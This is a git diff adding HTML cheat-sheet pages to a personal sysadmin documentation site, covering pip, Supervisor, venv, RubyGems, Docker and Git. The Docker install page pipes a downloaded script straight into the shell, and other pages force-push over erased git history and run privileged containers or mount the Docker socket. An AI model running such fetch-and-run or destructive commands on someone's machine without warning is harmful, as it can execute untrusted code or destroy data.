Pip Package Manager - 3os python pip package-manager cheat-sheet Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-04-09 Pip Python Package Manager Cheat Sheet Pip is the package installer for Python. You can use it to install packages from the Python Package Index and other indexes.
List Installed Packages With Pip List Outdated Packages Instal Or Update Package To Specific Version exmaple with MySQL_python package:
pip install MySQL_python == 1 .2.2
+
Update Package To The Latest Avalable Version exmaple with MySQL_python package:
pip install MySQL_python --upgrade
+
Update Pip Itself pip install --upgrade pip
+
Update All Packages Installed With Pip pip list --outdated --format= freeze | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U
+
Generate requirements.txt For a Project Run this command at terminal at the root of the project:
pip freeze > requirements.txt
+
Back to top
\ No newline at end of file
diff --git a/development/python/supervisor/index.html b/development/python/supervisor/index.html
new file mode 100644
index 000000000..2c51ac9b7
--- /dev/null
+++ b/development/python/supervisor/index.html
@@ -0,0 +1,259 @@
+
Supervisor Process Manager - 3os python supervisor processes-manager cheat-sheet Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-24 Supervisor Python Processes Management Supervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems. Official Supervisord Docs .
Example of Supervisord Web UI listening on localhost:9999
Tips of Supervisor Usage Seeing all child processes running
supervisorctl -c /path/to/supervisord.conf
+
I find it helpful to create an alias in my bash profile for those 2 commands above so that I don't have to manually type -c
all the time
Example:
echo "alias supervisord='supervisord -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'"
+echo "alias supervisorctl='supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'"
+
List All Processes You need to provide the path to the supervisor configuration file with - -c /path/to/supervisord.conf
supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+
Reload Changes from Config File to Supervisor Update Supervisor Configuration MacOS Supervisor Installation Install with pip as system package:
brew install supervisor
+
The default location of the supervisor configuration file is at /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
.
You can use a symbolic link to the configuration file to make it persistent. For example, you can move the configuration file to Dropbox folder and use a symbolic link to it.
Link the configuration file to the Dropbox folder:
rm -rf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+ln -s /Users/fire1ce/Dropbox/SettingsConfigs/supervisor/supervisord.conf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+
Start Supervisor Service on Boot In order to start the supervisor service on boot, we need to create a service file for MacOS.
sudo nano /Library/LaunchDaemons/com.agendaless.supervisord.plist
+
Append the following content to the file:
<!-- /Library/LaunchDaemons/com.agendaless.supervisord.plist -->
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version= "1.0" >
+<dict>
+ <key> KeepAlive</key>
+ <dict>
+ <key> SuccessfulExit</key>
+ <false/>
+ </dict>
+ <key> Label</key>
+ <string> com.agendaless.supervisord</string>
+ <key> ProgramArguments</key>
+ <array>
+ <string> /opt/homebrew/bin/supervisord</string>
+ <string> -n</string>
+ <string> -c</string>
+ <string> /System/Volumes/Data/opt/homebrew/etc/supervisord.conf</string>
+ </array>
+ <key> RunAtLoad</key>
+ <true/>
+</dict>
+</plist>
+
Supervisor Configuration File Example With 2 Managed Processes: [ unix_http_server ]
+file=/opt/homebrew/var/run/supervisor.sock # the path to the socket file
+
+
+[ inet_http_server ] # inet (TCP) server disabled by default
+port=127.0.0.1:9999 # ip_address:port specifier, *:port for all iface
+# username=user # default is no username (open server)
+# password=123 default is no password (open server)
+
+[ supervisord ]
+logfile=/opt/homebrew/var/log/supervisord.log # main log file# default $CWD/supervisord.log
+logfile_maxbytes=50MB # max main logfile bytes b4 rotation# default 50MB
+logfile_backups=10 # # of main logfile backups# 0 means none, default 10
+loglevel=info # log level# default info# others: debug,warn,trace
+pidfile=/opt/homebrew/var/run/supervisord.pid # supervisord pidfile# default supervisord.pid
+nodaemon=false # start in foreground if true# default false
+silent=false # no logs to stdout if true# default false
+minfds=1024 # min. avail startup file descriptors# default 1024
+minprocs=200 # min. avail process descriptors#default 200
+
+[ rpcinterface : supervisor ]
+supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface
+
+[supervisorctl]
+serverurl=unix:///opt/homebrew/var/run/supervisor.sock
+
+[include]
+files = /opt/homebrew/etc/supervisor.d/*.ini
+
+[program:macos-bt-connect-based-on-ip]
+command=/Users/fire1ce/.pyenv/versions/macos-bt-connect-based-on-ip/bin/python /Users/fire1ce/projects/macos-bt-connect-based-on-ip/macos-bt-connect-based-on-ip.py
+directory=/Users/fire1ce/projects/macos-bt-connect-based-on-ip
+user=fire1ce
+autostart=true
+autorestart=true
+startsecs=2
+startretries=3
+stdout_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.out.log
+stdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)
+stderr_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.err.log
+stderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)
+
+
+[ program : macos-screenlock-api ]
+command=/Users/fire1ce/.pyenv/versions/macos-screenlock-api/bin/python /Users/fire1ce/projects/macos-screenlock-api/macos-screenlock-api.py
+directory=/Users/fire1ce/projects/macos-screenlock-api
+user=fire1ce
+autostart=true
+autorestart=true
+startsecs=2
+startretries=3
+stdout_logfile=/opt/homebrew/var/log/macos-screenlock-api.out.log
+stdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)
+stderr_logfile=/opt/homebrew/var/log/macos-screenlock-api.err.log
+stderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)
+
Back to top
\ No newline at end of file
diff --git a/development/python/virtualenv/index.html b/development/python/virtualenv/index.html
new file mode 100644
index 000000000..d84e46c02
--- /dev/null
+++ b/development/python/virtualenv/index.html
@@ -0,0 +1,173 @@
+
Virtual Environment - 3os python venv cheat-sheet Python Virtual Environment About Python Virtual Environment - venv venv is a tool to create isolated Python environments. Since Python 3.3, a subset of it has been integrated into the standard library under the venv module. The venv module provides support for creating lightweight “virtual environments†with their own site directories, optionally isolated from system site directories. Each virtual environment has its own Python binary (which matches the version of the binary that was used to create this environment) and can have its own independent set of installed Python packages in its site directories.
Install venv In order to install venv
, we need to install the following packages:
apt example sudo apt install python3-venv
+
Initialization of a Virtual Environment Go to the root destination of your project and run the following command:
This will create a virtual environment in the current directory. The virtual environment folder will be named .venv
.
Activation of a Virtual Environment In order to activate a virtual environment, from the root directory of your project, run the following command:
source .venv/bin/activate
+
Check if the virtual environment is activated by running the following command:
The output should be with ../.venv/bin/python
as the output.
Bonus:
You can add an alias to your bash profile to make it easier to activate the virtual environment:
alias activate = 'source .venv/bin/activate'
+
Deactivation of a Virtual Environment When you are done with the virtual environment, you can deactivate it by running the following command:
Or alternatively you can exit the current shell.
Back to top
\ No newline at end of file
diff --git a/development/ruby/ruby/index.html b/development/ruby/ruby/index.html
new file mode 100644
index 000000000..093d9064b
--- /dev/null
+++ b/development/ruby/ruby/index.html
@@ -0,0 +1,153 @@
+
Ruby Gem Package Manager - 3os ruby gem package-manager cheat-sheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-09 Ruby Gem Package Manager RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them.
Finding Installed And Available Gems Installing New Gems gem install rails_utils
+
Removing / Deleting Gems gem uninstall rails_utils
+
Finding Outdated Gems Update All the Gems Install rubygems-update
gem install rubygems-update
+
Then run:
gem update --system
+update_rubygems
+
Reading The Gem Documentation One of the most handy and important things about gems is that they [should] come with good documentation to allow you to start working with them fast. The simplest way to go with documentation is to run a local server where you will have access to all installed gems’ usage instructions.
Run the following to run a documentation server:
it will start a server on port 8808.
# Server started at http://0.0.0.0:8808
+
Back to top
\ No newline at end of file
diff --git a/devops/docker/common-docker-commands/index.html b/devops/docker/common-docker-commands/index.html
new file mode 100644
index 000000000..7b7ded918
--- /dev/null
+++ b/devops/docker/common-docker-commands/index.html
@@ -0,0 +1,187 @@
+
Common Docker Commands - 3os docker cheat-sheet Common Docker Commands This is a short summary of the most commonly used Docker commands. If you're new to Docker, or even experienced Docker, it can be helpful to have a quick reference to the most commonly used Docker commands for managing the Docker environment.
Show all Containers Including Running and Stopped Show Docker Container Logs docker logs <container_id>
+
Get A Container Shell docker exec -it <container_id> /bin/bash
+
or
docker exec -it <container_id> /bin/sh
+
depending on the shells available on the Docker image.
Stoping Containers docker stop <container_id>
+
foce stop with kill
docker kill <container_id>
+
Removing Containers docker rm <container_id>
+
force remove
docker rm -f <container_id>
+
Find Container IP Address docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container name/id>
+
Copy Files into Docker Container docker cp <local file> <container name/id>:<remote file>
+
Copy Files from Docker Container docker cp <container name/id>:<remote file> <local file>
+
Purging Purging All Unused or Dangling Images, Containers, Volumes, and Networks Docker provides a single command that will clean up any resources — images, containers, volumes, and networks — that are dangling (not associated with a container):
To additionally remove any stopped containers and all unused images (not just dangling images), add the -a flag to the command:
Monitor System Resource Utilization for Running Containers To check the CPU, memory, and network I/O usage of a single container, you can use:
docker stats <container>
+
For all containers listed by ID:
docker stats $( docker ps -q)
+
For all containers listed by name:
docker stats $( docker ps --format '{{.Names}}' )
+
For all containers listed by image:
docker ps -a -f ancestor = ubuntu
+
Remove all untagged images:
docker rmi $( docker images | grep “^†| awk '{split($0,a," "); print a[3]}' )
+
Remove container by a regular expression:
docker ps -a | grep wildfly | awk '{print $1}' | xargs docker rm -f
+
Remove all exited containers:
docker rm -f $( docker ps -a | grep Exit | awk '{ print $1 }' )
+
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-containers/index.html b/devops/docker/docker-containers/index.html
new file mode 100644
index 000000000..36cf393f2
--- /dev/null
+++ b/devops/docker/docker-containers/index.html
@@ -0,0 +1,173 @@
+
Containers Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Containers Cheat Sheet What's a Docker Container? A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.
Containers Your basic isolated Docker process . Containers are to Virtual Machines as threads are to processes. Or you can think of them as chroots on steroids.
Lifecycle Normally if you run a container without options it will start and stop immediately, if you want keep it running you can use the command, docker run -td container_id
this will use the option -t
that will allocate a pseudo-TTY session and -d
that will detach automatically the container (run container in background and print container ID).
If you want a transient container, docker run --rm
will remove the container after it stops.
If you want to map a directory on the host to a docker container, docker run -v $HOSTDIR:$DOCKERDIR
. Also see Volumes .
If you want to remove also the volumes associated with the container, the deletion of the container must include the -v
switch like in docker rm -v
.
There's also a logging driver available for individual containers in docker 1.10. To run docker with a custom log driver (i.e., to syslog), use docker run --log-driver=syslog
.
Another useful option is docker run --name yourname docker_image
because when you specify the --name
inside the run command this will allow you to start and stop a container by calling it with the name the you specified when you created it.
Starting and Stopping If you want to detach from a running container, use Ctrl + p, Ctrl + q
. If you want to integrate a container with a host process manager , start the daemon with -r=false
then use docker start -a
.
If you want to expose container ports through the host, see the exposing ports section.
Restart policies on crashed docker instances are covered here .
CPU Constraints You can limit CPU, either using a percentage of all CPUs, or by using specific cores.
For example, you can tell the cpu-shares
setting. The setting is a bit strange -- 1024 means 100% of the CPU, so if you want the container to take 50% of all CPU cores, you should specify 512. See https://goldmann.pl/blog/2014/09/11/resource-management-in-docker/#_cpu for more:
docker run -it -c 512 agileek/cpuset-test
+
You can also only use some CPU cores using cpuset-cpus
. See https://agileek.github.io/docker/2014/08/06/docker-cpuset/ for details and some nice videos:
docker run -it --cpuset-cpus= 0 ,4,6 agileek/cpuset-test
+
Note that Docker can still see all of the CPUs inside the container -- it just isn't using all of them. See https://github.com/docker/docker/issues/20770 for more details.
Memory Constraints You can also set memory constraints on Docker:
docker run -it -m 300M ubuntu:14.04 /bin/bash
+
Capabilities Linux capabilities can be set by using cap-add
and cap-drop
. See https://docs.docker.com/engine/reference/run/#/runtime-privilege-and-linux-capabilities for details. This should be used for greater security.
To mount a FUSE based filesystem, you need to combine both --cap-add and --device:
docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs
+
Give access to a single device:
docker run -it --device= /dev/ttyUSB0 debian bash
+
Give access to all devices:
docker run -it --privileged -v /dev/bus/usb:/dev/bus/usb debian bash
+
More info about privileged containers here .
Info docker ps
shows running containers. docker logs
gets logs from container. (You can use a custom log driver, but logs is only available for json-file
and journald
in 1.10). docker inspect
looks at all the info on a container (including IP address). docker events
gets events from container. docker port
shows public facing port of container. docker top
shows running processes in container. docker stats
shows containers' resource usage statistics. docker diff
shows changed files in the container's FS. docker ps -a
shows running and stopped containers.
docker stats --all
shows a list of all containers, default shows just running.
Import / Export docker cp
copies files or folders between a container and the local filesystem. docker export
turns container filesystem into tarball archive stream to STDOUT. Executing Commands To enter a running container, attach a new shell process to a running container called foo, use: docker exec -it foo /bin/bash
.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-images/index.html b/devops/docker/docker-images/index.html
new file mode 100644
index 000000000..4733023f1
--- /dev/null
+++ b/devops/docker/docker-images/index.html
@@ -0,0 +1,171 @@
+
Images Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Images Cheat Sheet What's a Docker Image? A Docker image is a file used to execute code in a Docker container. Docker images act as a set of instructions to build a Docker container, like a template. Docker images also act as the starting point when using Docker. An image is comparable to a snapshot in virtual machine (VM) environments.
Images Images are just templates for docker containers .
Lifecycle docker images
shows all images. docker import
creates an image from a tarball. docker build
creates image from Dockerfile. docker commit
creates image from a container, pausing it temporarily if it is running. docker rmi
removes an image. docker load
loads an image from a tar archive as STDIN, including images and tags (as of 0.7). docker save
saves an image to a tar archive stream to STDOUT with all parent layers, tags & versions (as of 0.7). Info Cleaning up While you can use the docker rmi
command to remove specific images, there's a tool called docker-gc that will safely clean up images that are no longer used by any containers. As of docker 1.13, docker image prune
is also available for removing unused images. See Prune .
Load/Save image Load an image from file:
docker load < my_image.tar.gz
+
Save an existing image:
docker save my_image:my_tag | gzip > my_image.tar.gz
+
Import/Export container Import a container as an image from file:
cat my_container.tar.gz | docker import - my_image:my_tag
+
Export an existing container:
docker export my_container | gzip > my_container.tar.gz
+
Difference between loading a saved image and importing an exported container as an image Loading an image using the load
command creates a new image including its history. Importing a container as an image using the import
command creates a new image excluding the history which results in a smaller image size compared to loading an image.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-install/index.html b/devops/docker/docker-install/index.html
new file mode 100644
index 000000000..847762689
--- /dev/null
+++ b/devops/docker/docker-install/index.html
@@ -0,0 +1,183 @@
+
Docker Installation - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Installation You can download and install Docker on multiple platforms. The following are the most common ways to install Docker on Linux, Mac, and Windows. You can also install Docker on other platforms if you have the necessary software.
Images Linux Run this quick and easy install script provided by Docker:
curl -sSL https://get.docker.com/ | sh
+
If you're not willing to run a random shell script, please see the installation instructions for your distribution.
If you are a complete Docker newbie, you should follow the series of tutorials now.
macOS Download and install Docker Community Edition . if you have Homebrew-Cask, just type brew install --cask docker
. Or Download and install Docker Toolbox . Docker For Mac is nice, but it's not quite as finished as the VirtualBox install. See the comparison .
NOTE Docker Toolbox is legacy. You should to use Docker Community Edition, See Docker Toolbox .
Once you've installed Docker Community Edition, click the docker icon in Launchpad. Then start up a container:
That's it, you have a running Docker container.
If you are a complete Docker newbie, you should probably follow the series of tutorials now.
Windows 10 Instructions to install Docker Desktop for Windows can be found here
Once installed, open powershell as administrator and run:
# Display the version of docker installed:
+docker version
+
+# Pull, create, and run 'hello-world':
+docker run hello-world
+
To continue with this cheat sheet, right click the Docker icon in the system tray, and go to settings. In order to mount volumes, the C:/ drive will need to be enabled in the settings to that information can be passed into the containers (later described in this article).
To switch between Windows containers and Linux containers, right click the icon in the system tray and click the button to switch container operating system Doing this will stop the current containers that are running, and make them unaccessible until the container OS is switched back.
Additionally, if you have WSL or WSL2 installed on your desktop, you might want to install the Linux Kernel for Windows. Instructions can be found here . This requires the Windows Subsystem for Linux feature. This will allow for containers to be accessed by WSL operating systems, as well as the efficiency gain from running WSL operating systems in docker. It is also preferred to use Windows terminal for this.
Windows Server 2016 / 2019 Follow Microsoft's instructions that can be found here
If using the latest edge version of 2019, be prepared to only work in powershell, as it is only a servercore image (no desktop interface). When starting this machine, it will login and go straight to a powershell window. It is reccomended to install text editors and other tools using Chocolatey .
After installing, these commands will work:
# Display the version of docker installed:
+docker version
+
+# Pull, create, and run 'hello-world':
+docker run hello-world
+
Windows Server 2016 is not able to run Linux images.
Windows Server Build 2004 is capable of running both linux and windows containers simultaneously through Hyper-V isolation. When running containers, use the --isolation=hyperv
command, which will isolate the container using a seperate kernel instance.
Check Version It is very important that you always know the current version of Docker you are currently running on at any point in time. This is very helpful because you get to know what features are compatible with what you have running. This is also important because you know what containers to run from the docker store when you are trying to get template containers. That said let see how to know which version of docker we have running currently.
Get the server version:
$ docker version --format '{{.Server.Version}}'
+1.8.0
+
You can also dump raw JSON data:
$ docker version --format '{{json .}}'
+{"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"am"}
+
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-networks/index.html b/devops/docker/docker-networks/index.html
new file mode 100644
index 000000000..d630db6ee
--- /dev/null
+++ b/devops/docker/docker-networks/index.html
@@ -0,0 +1,179 @@
+
Networks & Links Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Docker Networks & Links Cheat Sheet Networks Docker has a networks feature. Docker automatically creates 3 network interfaces when you install it (bridge, host none). A new container is launched into the bridge network by default. To enable communication between multiple containers, you can create a new network and launch containers in it. This enables containers to communicate to each other while being isolated from containers that are not connected to the network. Furthermore, it allows to map container names to their IP addresses. See working with networks for more details.
Lifecycle docker network create
NAME Create a new network (default type: bridge). docker network rm
NAME Remove one or more networks by name or identifier. No containers can be connected to the network when deleting it. Info Connection You can specify a specific IP address for a container :
# create a new bridge network with your subnet and gateway for your ip block
+docker network create --subnet 203 .0.113.0/24 --gateway 203 .0.113.254 iptastic
+
+# run a nginx container with a specific ip in that block
+$ docker run --rm -it --net iptastic --ip 203 .0.113.2 nginx
+
+# curl the ip from any other place (assuming this is a public ip block duh)
+$ curl 203 .0.113.2
+
Links Links are how Docker containers talk to each other through TCP/IP ports . Atlassian show worked examples. You can also resolve links by hostname .
This has been deprecated to some extent by user-defined networks .
NOTE: If you want containers to ONLY communicate with each other through links, start the docker daemon with -icc=false
to disable inter process communication.
If you have a container with the name CONTAINER (specified by docker run --name CONTAINER
) and in the Dockerfile, it has an exposed port:
Then if we create another container called LINKED like so:
docker run -d --link CONTAINER:ALIAS --name LINKED user/wordpress
+
Then the exposed ports and aliases of CONTAINER will show up in LINKED with the following environment variables:
$ALIAS_PORT_1337_TCP_PORT
+$ALIAS_PORT_1337_TCP_ADDR
+
And you can connect to it that way.
To delete links, use docker rm --link
.
Generally, linking between docker services is a subset of "service discovery", a big problem if you're planning to use Docker at scale in production. Please read The Docker Ecosystem: Service Discovery and Distributed Configuration Stores for more info.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-security/index.html b/devops/docker/docker-security/index.html
new file mode 100644
index 000000000..66099baf9
--- /dev/null
+++ b/devops/docker/docker-security/index.html
@@ -0,0 +1,175 @@
+
Security & Best Practices - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Docker Security & Best Practices Security This is where security tips about Docker go. The Docker security page goes into more detail.
First things first: Docker runs as root. If you are in the docker
group, you effectively have root access . If you expose the docker unix socket to a container, you are giving the container root access to the host .
Docker should not be your only defense. You should secure and harden it.
For an understanding of what containers leave exposed, you should read Understanding and Hardening Linux Containers by Aaron Grattafiori . This is a complete and comprehensive guide to the issues involved with containers, with a plethora of links and footnotes leading on to yet more useful content. The security tips following are useful if you've already hardened containers in the past, but are not a substitute for understanding.
Security Tips For greatest security, you want to run Docker inside a virtual machine. This is straight from the Docker Security Team Lead -- slides / notes . Then, run with AppArmor / seccomp / SELinux / grsec etc to limit the container permissions . See the Docker 1.10 security features for more details.
Docker image ids are sensitive information and should not be exposed to the outside world. Treat them like passwords.
See the Docker Security Cheat Sheet by Thomas Sjögren : some good stuff about container hardening in there.
Check out the docker bench security script , download the white papers .
Snyk's 10 Docker Image Security Best Practices cheat sheet
You should start off by using a kernel with unstable patches for grsecurity / pax compiled in, such as Alpine Linux . If you are using grsecurity in production, you should spring for commercial support for the stable patches , same as you would do for RedHat. It's $200 a month, which is nothing to your devops budget.
Since docker 1.11 you can easily limit the number of active processes running inside a container to prevent fork bombs. This requires a linux kernel >= 4.3 with CGROUP_PIDS=y to be in the kernel configuration.
docker run --pids-limit=64
+
Also available since docker 1.11 is the ability to prevent processes from gaining new privileges. This feature have been in the linux kernel since version 3.5. You can read more about it in this blog post.
docker run --security-opt= no-new-privileges
+
From the Docker Security Cheat Sheet (it's in PDF which makes it hard to use, so copying below) by Container Solutions :
Turn off interprocess communication with:
docker -d --icc= false --iptables
+
Set the container to be read-only:
Verify images with a hashsum:
docker pull debian@sha256:a25306f3850e1bd44541976aa7b5fd0a29be
+
Set volumes to be read only:
docker run -v $( pwd ) /secrets:/secrets:ro debian
+
Define and run a user in your Dockerfile so you don't run as root inside the container:
RUN groupadd -r user && useradd -r -g user user
+USER user
+
User Namespaces There's also work on user namespaces -- it is in 1.10 but is not enabled by default.
To enable user namespaces ("remap the userns") in Ubuntu 15.10, follow the blog example .
Security Videos Security Roadmap The Docker roadmap talks about seccomp support . There is an AppArmor policy generator called bane , and they're working on security profiles .
Best Practices This is where general Docker best practices and war stories go:
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/watchtower/index.html b/devops/docker/watchtower/index.html
new file mode 100644
index 000000000..2d0a539e3
--- /dev/null
+++ b/devops/docker/watchtower/index.html
@@ -0,0 +1,194 @@
+
Watchtower - 3os docker container watchtower Authors: fire1ce | Created: 2021-12-03 | Last update: 2022-03-24 Watchtower
Quick Start With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially. Run the watchtower container with the following command:
What is Watchtower? Watchtower is an application that will monitor your running Docker containers and watch for changes to the images that those containers were originally started from. If watchtower detects that an image has changed, it will automatically restart the container using the new image.
With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially.
Full documanation can be found at Watchtower Documentation . Github repo can be found at Watchtower Github Repository .
Run Ones You can run Watchtower run once
to force an update of a containers by running the following command:
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock containrrr/watchtower --run-once
+
Docker Compose Example Blow is and example of a docker-compose.yml file that uses watchtower to automatically update your running containers at 3:30 AM every day, sending notifications to Telegram
with shoutrrr
version : '3'
+
+services :
+ watchtower :
+ image : containrrr/watchtower
+ container_name : watchtower
+ hostname : port-watchtower
+ restart : always
+ network_mode : bridge
+ volumes :
+ - /var/run/docker.sock:/var/run/docker.sock
+ - /etc/localtime:/etc/localtime
+ environment :
+ - WATCHTOWER_NOTIFICATIONS=shoutrrr
+ - WATCHTOWER_NOTIFICATION_URL=telegram://<Bot-api-token>@telegram/?channels=<channel-id>
+ command : --schedule '0 30 3 * * *' --cleanup
+
Back to top
\ No newline at end of file
diff --git a/devops/git/delete-commit-history/index.html b/devops/git/delete-commit-history/index.html
new file mode 100644
index 000000000..63540feff
--- /dev/null
+++ b/devops/git/delete-commit-history/index.html
@@ -0,0 +1,173 @@
+
Removing Sensitive Data - 3os github history security Authors: fire1ce | Created: 2022-02-04 | Last update: 2022-03-24 Removing Sensitive Data from a Repository History As humans, we sometimes make mistakes. One of them is committing sensitive data in our Git repository. If you commit sensitive data, such as a password, SSH key, API tokens, license keys and so on into a Git repository, you can remove it from the history. You can follow the official GitHub instructions to remove sensitive data from the history. It's probably the best and the right way to do it.
Below is a fast way to remove sensitive data from a repository's history but with a few caveats like loosing all the history of the repository.
Delete Commit History in Github Repository Danger
This will remove your old commit history completely, You can’t recover it again!
Create Orphan Branch – Create a new orphan branch in git repository. The newly created branch will not show in ‘git branch’ command.
git checkout --orphan temp_branch
+
Add Files to Branch – Now add all files to newly created branch and commit them using following commands.
git add -A
+git commit -am "first commit"
+
Delete master/main Branch. Adjust the command according your git repository
Rename Current Branch – After deleting the master/main branch, let’s rename newly created branch name to master/main .
Push Changes – You have completed the changes to your local git repository. Finally, push your changes to the remote master/main (Github) repository forcefully.
git push -f origin main
+
Back to top
\ No newline at end of file
diff --git a/devops/git/git-cli-cheat-sheet/index.html b/devops/git/git-cli-cheat-sheet/index.html
new file mode 100644
index 000000000..ece99284a
--- /dev/null
+++ b/devops/git/git-cli-cheat-sheet/index.html
@@ -0,0 +1,204 @@
+
Git Cli Cheat Sheet - 3os github git cheat-sheet Git Cli Cheat Sheet Git is a free and open source distributed version control system designed to quickly and efficiently manage everything from small to very large projects.
Create Repositories A new repository can either be created locally, or an existing repository can be cloned. When a repository was initialized locally, you have to push it to GitHub afterwards.
The git init command turns an existing directory into a new Git repository inside the folder you are running this command. After using the git init
command, link the local repository to an empty GitHub repository using the following command:
Specifies the remote repository for your local repository. The url points to a repository on GitHub.
git remote add origin [ url]
+
Clone (download) a repository that already exists on GitHub, including all of the files, branches, and commits
Git Configuration Configure user information for all local repositories
Sets the name you want attached to your commit transactions
git config --global user.name "[name]"
+
Sets the email you want attached to your commit transactions
git config --global user.email "[email address]"
+
Enables helpful colorization of command line output
git config --global color.ui auto
+
Synchronize Changes Synchronize your local repository with the remote repository on GitHub.com
Downloads all history from the remote tracking branches
Combines remote tracking branches into current local branch
Uploads all local branch commits to GitHub
Updates your current local working branch with all new commits from the corresponding remote branch on GitHub. git pull
is a combination of git fetch
and git merge
Redo Commits Erase mistakes and craft replacement history
Undoes all commits after [commit], preserving changes locally
If you don't want to reset absolutely, but relatively that is also possible using
which undoes the last 2 commits. Discards all history and changes back to the specified commit
git reset --hard [ commit]
+
Branches Branches are an important part of working with Git. Any commits you make will be made on the branch you’re currently “checked out†to. Use git status to see which branch that is.
Creates a new branch
git branch [ branch-name]
+
Switches to the specified branch and updates the working directory
git switch -c [ branch-name]
+
or you can use
git checkout -b [ branch-name]
+
to both create and switch to the branch simultaneously. Combines the specified branch’s history into the current branch. This is usually done in pull requests, but is an important Git operation.
Deletes the specified branch
git branch -d [ branch-name]
+
Make Changes Browse and inspect the evolution of project files
Lists version history for the current branch
Lists version history for a file, beyond renames (works only for a single file)
git log --follow [ file]
+
Shows content differences between two branches
git diff [ first-branch] ...[ second-branch]
+
Outputs metadata and content changes of the specified commit
Snapshots the file in preparation for versioning
Records file snapshots permanently in version history
git commit -m "[descriptive message]"
+
The .gitignore file Sometimes it may be a good idea to exclude files from being tracked with Git. This is typically done in a special file named .gitignore. You can find helpful templates for .gitignore
files at github.com/github/gitignore . If there are certain files (like .vscode
or .ide
) that should be discluded from all projects, you can create a global .gitignore
file to do so.
Untrack Files Already Added to git Repository Based on .gitignore Commit all your changes. Before proceeding, make sure all your changes are committed, including your .gitignore file. Remove everything from the repository. To clear your repo, use:
Re add everything.
Commit.
git commit -m ".gitignore fix"
+
Use Gist as Repository It's probably easiest if you just start by cloning the gist, so that origin
(a "remote" that refers to the original repository) is set up for you. Then you can just do git push origin master
. For example:
git clone git@gist.github.com:869085.git mygist
+cd mygist
+
Add you changes to the repository.
git add .
+git commit -m "Better comments"
+git push origin master
+
However, if you don't want to redo your changes, you can do:
cd mygist
+git remote add origin git@gist.github.com:869085.git
+git fetch origin
+# Push your changes, also setting the upstream for master:
+git push -u origin master
+
Strictly speaking, the git fetch origin
and -u
argument to git push origin master
are optional, but they will helpfully associate the upstream branch master
in origin
with your local branch master
.
Back to top
\ No newline at end of file
diff --git a/devops/git/git-submodules/index.html b/devops/git/git-submodules/index.html
new file mode 100644
index 000000000..3283a3d67
--- /dev/null
+++ b/devops/git/git-submodules/index.html
@@ -0,0 +1,179 @@
+
Submodules Cheat Sheet - 3os github cheat-sheet submodules Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Git Submodules Cheat Sheet What is a Submodule? Git submodules allow you to keep a git repository as a subdirectory of another git repository. Git submodules are simply a reference to another repository at a particular snapshot in time. Git submodules enable a Git repository to incorporate and track version history of external code.
Add a Submodule You need to know the remote git repository url and where you want to place that it in your repository.
for example:
git submodule add https://github.com/fire1ce/3os.org path/to/submodule
+git add .
+git commit -m "adds submodule path/to/submodule"
+
Cloning A Project With Submodules When you clone a repository that contains submodules there are a few extra steps to be taken.
for example:
git clone https://github.com/fire1ce/3os.org repo
+cd repo
+git submodule init
+git submodule update
+
